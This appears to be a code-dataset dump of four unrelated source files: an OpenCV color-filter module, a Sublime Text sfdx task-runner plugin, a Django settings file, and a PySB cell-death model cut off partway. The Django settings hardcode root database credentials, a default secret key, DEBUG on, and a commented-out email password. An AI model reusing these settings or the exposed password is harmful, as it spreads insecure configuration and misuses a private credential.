frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 48
|
2019-09-22T07:08:35.000Z
|
2022-01-15T16:19:42.000Z
|
opsi/modules/color.py
|
frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 16
|
2019-10-02T18:48:59.000Z
|
2020-12-06T04:23:03.000Z
|
opsi/modules/color.py
|
frcmi/opensight
|
3b0c0c63a877f739a1ee8261a9befbb44a3b7796
|
[
"MIT"
] | 11
|
2019-09-19T15:57:06.000Z
|
2020-08-12T01:08:44.000Z
|
from dataclasses import dataclass
import cv2
import numpy as np
from opsi.manager.manager_schema import Function
from opsi.manager.types import RangeType, Slide
from opsi.util.cv import Mat, MatBW
from opsi.util.cv.mat import Color
from opsi.util.cv.shape import Point
__package__ = "opsi.colorops"
__version__ = "0.123"
class Blur(Function):
@dataclass
class Settings:
radius: int
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.blur(self.settings.radius)
return self.Outputs(img=img)
class HSVRange(Function):
@dataclass
class Settings:
hue: RangeType(0, 359)
sat: RangeType(0, 255)
val: RangeType(0, 255)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
imgBW: MatBW
def run(self, inputs):
imgBW = inputs.img.mat.hsv_threshold(
self.settings.hue, self.settings.sat, self.settings.val
)
return self.Outputs(imgBW=imgBW)
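# Rough OpenCV equivalent of the HSV threshold above (a sketch, not the actual
# opsi.util.cv implementation): convert BGR to HSV and keep pixels whose hue,
# saturation and value fall inside the configured ranges. OpenCV stores hue as
# 0-179, hence the halving of the 0-359 hue settings.
#
#   hsv = cv2.cvtColor(bgr_image, cv2.COLOR_BGR2HSV)
#   mask = cv2.inRange(hsv,
#                      (hue_lo // 2, sat_lo, val_lo),
#                      (hue_hi // 2, sat_hi, val_hi))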
class Greyscale(Function):
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.greyscale
return self.Outputs(img=img)
class Canny(Function):
@dataclass
class Settings:
threshold: RangeType(0, 255)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
imgBW: MatBW
def run(self, inputs):
return self.Outputs(
imgBW=inputs.img.mat.canny(
self.settings.threshold[0], self.settings.threshold[1]
)
)
class AbsoluteDifferenceRGB(Function):
@dataclass
class Settings:
red: Slide(min=0, max=255, decimal=False)
green: Slide(min=0, max=255, decimal=False)
blue: Slide(min=0, max=255, decimal=False)
to_greyscale: bool
clamp_max: bool
clamp_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
diff = inputs.img.mat.abs_diff(
np.array(
[self.settings.blue, self.settings.green, self.settings.red],
                dtype=float,
)[None],
)
if self.settings.to_greyscale:
diff = diff.greyscale
if self.settings.clamp_max:
diff = Mat(np.minimum(diff.img, self.settings.clamp_value))
return self.Outputs(img=diff)
class AbsoluteDifferenceHSV(Function):
@dataclass
class Settings:
hue: Slide(min=0, max=359, decimal=False)
hue_sensitivity: int
sat: Slide(min=0, max=255, decimal=False)
sat_sensitivity: int
val: Slide(min=0, max=255, decimal=False)
val_sensitivity: int
clamp_max: bool
clamp_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img_hsv = inputs.img.mat.hsv
diff_hsv = img_hsv.abs_diff(
np.array(
[self.settings.hue, self.settings.sat, self.settings.val],
                dtype=float,
)[
None
], # [None] adds a dimension to the ndarray object created by np.array() -
# See https://stackoverflow.com/questions/37867354/in-numpy-what-does-selection-by-none-do
)
scaled_diff = np.multiply(
diff_hsv,
np.array(
[
self.settings.hue_sensitivity,
self.settings.sat_sensitivity,
self.settings.val_sensitivity,
],
dtype=np.uint16,
),
).astype(np.uint16)
greyscale = Mat(scaled_diff).greyscale
if self.settings.clamp_max:
greyscale = Mat(
np.minimum(greyscale.img, self.settings.clamp_value).astype(np.uint8)
)
else:
greyscale = Mat(np.minimum(greyscale.img, 255).astype(np.uint8))
return self.Outputs(img=greyscale)
class ClampMax(Function):
@dataclass
class Settings:
max_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
return self.Outputs(img=np.minimum(inputs.img, self.settings.max_value))
class ClampMin(Function):
@dataclass
class Settings:
min_value: Slide(min=0, max=255, decimal=False)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
return self.Outputs(img=np.maximum(inputs.img, self.settings.min_value))
class ColorSampler(Function):
@dataclass
class Settings:
x_pct: Slide(min=0, max=100)
y_pct: Slide(min=0, max=100)
draw_color: bool
draw_hsv: bool
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
color: Color
img: Mat
def run(self, inputs):
# Find the pixel coordinates to sample in the image
height, width = inputs.img.mat.img.shape[:2]
sample_coords = (
int(width * self.settings.x_pct / 100.0 + 10),
int(height * self.settings.y_pct / 100.0 + 10),
)
color_bgr = inputs.img.mat.img[sample_coords[1], sample_coords[0]]
draw = inputs.img.mat
if self.settings.draw_color:
draw = np.copy(inputs.img.mat.img)
# Draw a small circle (of radius 5) to show the point.
cv2.circle(draw, sample_coords, 5, (0, 0, 255), 3)
# Find the color in HSV to make a contrasting color
            color_hsv = Mat(np.uint8([[color_bgr]])).hsv.img[0][0]
color_hsv[0] *= 2 # Scale the hue value to be in a range of 0-359
# Create a string to represent the color in either RGB or HSV
if self.settings.draw_hsv:
color_str = "H{} S{} V{}".format(*color_hsv)
else:
color_str = "B{} G{} R{}".format(*color_bgr)
# Choose a (Hopefully) Contrasting color
draw_color = (
int(255 - color_bgr[0]),
int(255 - color_bgr[1]),
int(255 - color_bgr[2]),
)
cv2.putText(
draw,
color_str,
(sample_coords[0] + 10, sample_coords[1] + 10),
cv2.FONT_HERSHEY_SIMPLEX,
0.5,
draw_color,
lineType=cv2.LINE_AA,
)
draw = Mat(draw)
color = Color(color_bgr[2], color_bgr[1], color_bgr[0])
return self.Outputs(color=color, img=draw)
class ColorDetector(Function):
@dataclass
class Settings:
red_hue: Slide(min=0, max=359, decimal=False)
yellow_hue: Slide(min=0, max=359, decimal=False)
green_hue: Slide(min=0, max=359, decimal=False)
blue_hue: Slide(min=0, max=359, decimal=False)
@dataclass
class Inputs:
color: Color
@dataclass
class Outputs:
color_string: str
def run(self, inputs):
        def hue_dist(test: int, reference: int):
            # Circular distance on the 0-359 hue wheel, symmetric across the wrap-around.
            diff = abs(reference - test) % 360
            return min(diff, 360 - diff)
color_hue = (
Mat(
np.uint8([[[inputs.color.blue, inputs.color.green, inputs.color.red]]])
).hsv.img[0][0][0]
* 2
)
hue_strings = {
self.settings.red_hue: "R",
self.settings.yellow_hue: "Y",
self.settings.green_hue: "G",
self.settings.blue_hue: "B",
}
output_str = ""
min_dist = 360
for hue in hue_strings.keys():
dist = hue_dist(hue, color_hue)
if dist < min_dist:
min_dist = dist
output_str = hue_strings[hue]
return self.Outputs(color_string=output_str)
class Resize(Function):
@dataclass
class Settings:
width: int
height: int
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.resize(Point(self.settings.width, self.settings.height))
return self.Outputs(img=img)
class ColorBalance(Function):
@dataclass
class Settings:
red_balance: Slide(min=0, max=100)
blue_balance: Slide(min=0, max=100)
@dataclass
class Inputs:
img: Mat
@dataclass
class Outputs:
img: Mat
def run(self, inputs):
img = inputs.img.mat.color_balance(
self.settings.red_balance / 100.0, self.settings.blue_balance / 100.0
)
return self.Outputs(img=img)
| 24.580381
| 102
| 0.567232
|
89b9a597f059384e4295580394d81233e493f88b
| 8,547
|
py
|
Python
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 29
|
2016-12-15T07:14:44.000Z
|
2022-03-17T17:24:08.000Z
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 5
|
2017-02-14T02:04:44.000Z
|
2019-02-19T19:25:22.000Z
|
sfdx.py
|
iechenybsh/exiahuangl
|
6834ec0d40a53ece3c0ff738c5b728616da26a02
|
[
"Apache-2.0"
] | 12
|
2016-12-16T08:02:45.000Z
|
2020-02-20T00:00:58.000Z
|
import sublime
import sublime_plugin
import os, re
import json
from .setting import SfBasicConfig
from .uiutil import SublConsole
from . import util
SFDX_SETTINGS = "sfdx.sublime-settings"
class OpenSfdxSettingCommand(sublime_plugin.WindowCommand):
def run(self):
SETTING_PATH = os.path.join(sublime.packages_path(), "User", SFDX_SETTINGS)
if not os.path.exists(SETTING_PATH):
s = sublime.load_settings(SFDX_SETTINGS)
tasks = s.get("tasks")
custom_env = s.get("custom_env")
s.set("tasks", tasks)
s.set("custom_env", custom_env)
sublime.save_settings(SFDX_SETTINGS)
self.window.run_command("open_file", {
"file": SETTING_PATH
})
class SfdxCommand(sublime_plugin.WindowCommand):
def run(self):
self.sf_basic_config = SfBasicConfig()
self.settings = self.sf_basic_config.get_setting()
self.sublconsole = SublConsole(self.sf_basic_config)
self.window = sublime.active_window()
self.osutil = util.OsUtil(self.sf_basic_config)
s = sublime.load_settings(SFDX_SETTINGS)
tasks = s.get("tasks")
self.env = s.get("custom_env")
self.env.update(DxEnv().get_env())
self.env.update(CommandEnv(self.window, self.sf_basic_config.get_project_dir()).get_env())
self.sel_keys = [task["label"] for task in tasks]
self.sel_vals = [task for task in tasks]
self.window.show_quick_panel(self.sel_keys, self.panel_done, sublime.MONOSPACE_FONT)
def panel_done(self, picked):
        if picked < 0 or picked >= len(self.sel_keys):
            # The quick panel was cancelled or returned an out-of-range index.
            return
self.task = self.sel_vals[picked]
is_os_termial = "os_termial" in self.task and self.task["os_termial"]
if "SFDX_ALIAS" in self.task["command"]:
if not self.env["SFDX_ALIAS"] or len(self.env["SFDX_ALIAS"]) == 0:
self.sublconsole.showlog("sfdx alias empty! please check it!")
Cmder().run(self.window, self.env, self.task["command"], console=self.sublconsole.showlog, is_os_termial=is_os_termial, encoding='UTF-8')
class DxEnv():
def get_env(self):
return {
"SFDX_ALIAS" : self.__get_alias(),
}
def __get_alias(self):
return list(self.__get_alias_dict().keys())
def __get_alias_dict(self):
home = os.path.expanduser("~")
dx_alias_file = os.path.join(home, ".sfdx", "alias.json")
alias = {}
try:
if os.path.exists(dx_alias_file):
f = open(dx_alias_file)
data = json.load(f)
alias = data["orgs"]
f.close()
except Exception as ex:
pass
return alias
class CommandEnv():
def __init__(self, window, workspaceFolder):
self.window = window
self.workspaceFolder = workspaceFolder
def get_env(self):
# // ${selectedText} - the current selected text in the active file
file = self.window.active_view().file_name()
if file is None : file = ""
fileBasenameNoExtension, fileExtname = os.path.splitext(os.path.basename(file))
env = {
"cwd" : self.workspaceFolder,
"workspaceFolder" : self.workspaceFolder,
"workspaceFolderBasename" : os.path.basename(self.workspaceFolder),
"file" : file,
"fileBasenameNoExtension": fileBasenameNoExtension,
"fileExtname": fileExtname,
"relativeFile" : file.replace(self.workspaceFolder, ""),
"fileBasename": os.path.basename(file),
"fileDirname" : os.path.dirname(file),
"selectedText" : self.__get_sel_text(),
}
# print(env)
return env
def __get_sel_text(self):
try:
view = self.window.active_view()
sel = view.sel()
region1 = sel[0]
selectionText = view.substr(region1)
return selectionText
except Exception as ex:
pass
return ""
class Cmder():
def run(self, window, command_env, command, console=print, is_os_termial=False, encoding='UTF-8'):
self.index = 0
self.window = window
self.console = console
self.encoding = encoding
self.is_os_termial = is_os_termial
self.env = command_env
self.command = command
self.params = self.__get_command_params(command)
self.osutil = util.OsUtil()
UiWizard(command_params=self.params,
window=self.window,
callback=self.on_wizard_done).run()
def on_wizard_done(self, user_params):
command = self.command
for key, val in self.env.items():
if type(val) is str:
command = command.replace("${%s}" % key, val)
msgs = []
for param in self.__get_sys_env(command):
command = command.replace(param["param"], param["value"])
if not param["value"]: msgs.append("%s is null! please check it." % param["param"])
for param in user_params:
command = command.replace(param["param"], param["value"])
if not param["value"]: msgs.append("%s is null! please check it." % param["param"])
if len(msgs) > 0:
self.console("\n".join(msgs))
else:
self.console(command)
cmds = [self.osutil.get_cd_cmd(self.env["workspaceFolder"]), command]
if self.is_os_termial:
self.osutil.run_in_os_termial(cmds)
else:
self.osutil.run_in_sublime_cmd(cmds, encoding=self.encoding)
def __get_sys_env(self, command):
pattern = r"\${(env)(\s)*:(\s)*([^} ]+)(\s)*}"
matchedList = re.findall(pattern, command)
sys_env = []
if matchedList:
for param in matchedList:
key = param[3]
sys_env.append({
"param" : "${%s%s:%s%s%s}" % param,
"key" : key,
"value" : os.getenv(key, default=""),
"type" : param[0]
})
return sys_env
def __get_command_params(self, command):
pattern = r"\${(input|select)(\s)*:(\s)*([^} ]+)(\s)*}"
matchedList = re.findall(pattern, command)
params = []
if matchedList:
for param in matchedList:
key = param[3]
data = {
"param" : "${%s%s:%s%s%s}" % param,
"key" : key,
"value" : "",
"type" : param[0]
}
if data["type"] == "input":
if key in self.env:
data["value"] = str(self.env[key])
elif data["type"] == "select":
data["option"] = data["option-v"] = []
if key in self.env:
if isinstance(self.env[key], list):
data["option"] = data["option-v"] = self.env[key]
params.append(data)
return params
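# Small illustration (the command string is hypothetical) of the placeholder syntax
# parsed above: ${env:VAR} is resolved from the OS environment, while ${input:KEY}
# and ${select:KEY} become interactive prompts driven by UiWizard.
#
#   command = "sfdx force:org:open -u ${select:SFDX_ALIAS} --path ${input:start_page}"
#   re.findall(r"\${(input|select)(\s)*:(\s)*([^} ]+)(\s)*}", command)
#   # -> [('select', '', '', 'SFDX_ALIAS', ''), ('input', '', '', 'start_page', '')]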
class UiWizard():
def __init__(self, command_params, window, callback):
self.index = 0
self.command_params = command_params
self.window = window
self.callback = callback
def run(self, args=None):
if self.index > 0:
pre_data = self.command_params[self.index-1]
ui_type = pre_data["type"]
if ui_type == "input":
pre_data["value"] = args
elif ui_type == "select":
if 0 <= args and args < len(pre_data["option-v"]):
pre_data["value"] = pre_data["option-v"][args]
if self.index < len(self.command_params):
curr_data = self.command_params[self.index]
if curr_data["type"] == "input":
caption = "Please Input your %s: " % curr_data["key"]
self.window.show_input_panel(caption, curr_data["value"], self.run, None, None)
elif curr_data["type"] == "select":
show_opts = curr_data["option"]
self.window.show_quick_panel(show_opts, self.run, sublime.MONOSPACE_FONT)
self.index = self.index + 1
else:
self.callback(self.command_params)
class XyOpenUrlCommand(sublime_plugin.ApplicationCommand):
def run(command, url):
import webbrowser
webbrowser.open_new_tab(url)
| 37
| 145
| 0.558676
|
4336218e01685ceb7ebf5eb61a177f01229df672
| 3,914
|
py
|
Python
|
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | 1
|
2022-03-30T15:28:33.000Z
|
2022-03-30T15:28:33.000Z
|
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | null | null | null |
core/settings.py
|
piyushjain-pj/pneumonia_and_covid_prediction_tool
|
b5f503b1672b1093c4bd6f9e053d6024e4f73f9d
|
[
"MIT"
] | null | null | null |
import os
from decouple import config
from unipath import Path
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = Path(__file__).parent
CORE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = config('SECRET_KEY', default='S#perS3crEt_1122')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG', default=True, cast=bool)
# load production server from .env
ALLOWED_HOSTS = ['localhost', '127.0.0.1', config('SERVER', default='127.0.0.1')]
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'app' # Enable the inner app
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'core.urls'
LOGIN_REDIRECT_URL = "home" # Route defined in app/urls.py
LOGOUT_REDIRECT_URL = "home" # Route defined in app/urls.py
TEMPLATE_DIR = os.path.join(CORE_DIR, "core/templates") # ROOT dir for templates
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [TEMPLATE_DIR],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'core.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.mysql',
'NAME': 'djangonew',
'USER': 'root',
'PASSWORD': 'root',
'HOST': 'localhost',
'PORT': '3307',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Email Configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_USE_TLS = True
EMAIL_HOST = 'smtp.gmail.com'
EMAIL_HOST_USER = 'cnpptool@gmail.com'
EMAIL_HOST_PASSWORD = "password"
EMAIL_PORT = 587
# 'Piyush@12345'
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#############################################################
# SRC: https://devcenter.heroku.com/articles/django-assets
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_ROOT = os.path.join(CORE_DIR, 'staticfiles')
STATIC_URL = '/static/'
# Extra places for collectstatic to find static files.
STATICFILES_DIRS = (
os.path.join(CORE_DIR, 'core/static'),
)
#############################################################
#############################################################
| 29.428571
| 91
| 0.664027
|
197fc8950e489be9f03d27ae2510032afa686787
| 18,818
|
py
|
Python
|
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
log_complete/model_301.py
|
LoLab-VU/Bayesian_Inference_of_Network_Dynamics
|
54a5ef7e868be34289836bbbb024a2963c0c9c86
|
[
"MIT"
] | null | null | null |
# exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
Monomer('C8A', ['BidU', 'C3pro'])
Monomer('SmacM', ['BaxA'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('SmacC', ['Xiap'])
Monomer('ParpC')
Monomer('Xiap', ['SmacC', 'Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd', 'C6A'])
Monomer('C6A', ['C8pro'])
Monomer('C3pro', ['Apop', 'C8A'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'SmacM', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU', 'C6pro'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
Monomer('C6pro', ['C3A'])
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_2kf', 1.0)
Parameter('inhibition_0_SmacC_inhibitor_Xiap_inh_target_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_SmacM_cargo_M_SmacC_cargo_C_1kc', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_C6pro_substrate_C6A_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_C6pro_substrate_C6A_product_1kc', 1.0)
Parameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_2kf', 1.0)
Parameter('catalysis_0_C6A_catalyzer_C8pro_substrate_C8A_product_1kr', 1.0)
Parameter('catalysis_1_C6A_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('SmacM_0', 100000.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('SmacC_0', 0.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 75250.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C6A_0', 0.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
Parameter('C6pro_0', 100.0)
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('SmacM_obs', SmacM())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('SmacC_obs', SmacC())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C6A_obs', C6A())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
Observable('C6pro_obs', C6pro())
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
Rule('substrate_binding_0_Fadd_catalyzer_C8pro_substrate', Fadd(Receptor=ANY, C8pro=None) + C8pro(Fadd=None, C6A=None) | Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None), substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf, substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr)
Rule('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product', Fadd(Receptor=ANY, C8pro=1) % C8pro(Fadd=1, C6A=None) >> Fadd(Receptor=ANY, C8pro=None) + C8A(BidU=None, C3pro=None), catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc)
Rule('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=None, C3pro=None) + BidU(C8A=None) | C8A(BidU=1, C3pro=None) % BidU(C8A=1), catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf, catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr)
Rule('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product', C8A(BidU=1, C3pro=None) % BidU(C8A=1) >> C8A(BidU=None, C3pro=None) + BidT(), catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc)
Rule('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex', ApafI() + CytoCC() | ApafA(), conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf, conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr)
